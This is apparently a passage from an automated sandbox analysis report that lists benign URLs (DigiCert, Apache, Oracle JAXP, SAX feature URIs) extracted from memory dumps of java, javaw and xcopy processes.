Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009778000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D71000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://opensource.org/licenses/bsd-license.php
Source: xcopy.exe, 00000012.00000003.1854290642.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1854554489.000000000229F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/
Source: xcopy.exe, 00000012.00000003.1853919853.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/).
Source: xcopy.exe, 00000012.00000003.1851635615.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1854058277.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1853919853.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: xcopy.exe, 00000012.00000003.1851635615.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1854058277.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1853919853.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: xcopy.exe, 00000012.00000003.1854290642.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1854554489.000000000229F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.arbortext.com/customer_support/updates_
Source: xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1785372831.000000000229D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842945665.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: xcopy.exe, 00000012.00000003.1853919853.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ibm.com.
Source: xcopy.exe, 00000012.00000003.1898469033.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ietf.org/rfc/rfc2373.txt)
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.kurims.kyoto-u.ac.jp/~ooura/bessel.html
Source: xcopy.exe, 00000012.00000003.1878679223.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2004/em-rdf#
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jdk/
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jfr-info/
Source: xcopy.exe, 00000012.00000003.1859565574.000000000229F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/enable-errors
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/enable-exceptions
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/file-io-threshold
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/socket-io-threshold
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/a/lang$
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimitK
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit(L
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimitKV
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo:
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthche/xerC
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimitutil/7
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit;E
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimitJ
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit;T
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimitb
Source: java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager3)
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManagerP
Source: xcopy.exe, 00000012.00000003.1853919853.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sun.com.
Source: xcopy.exe, 00000012.00000003.1851469683.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.torchmobile.com/
Source: xcopy.exe, 00000012.00000003.1851469683.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.torchmobile.com/)
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD=
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTDKD
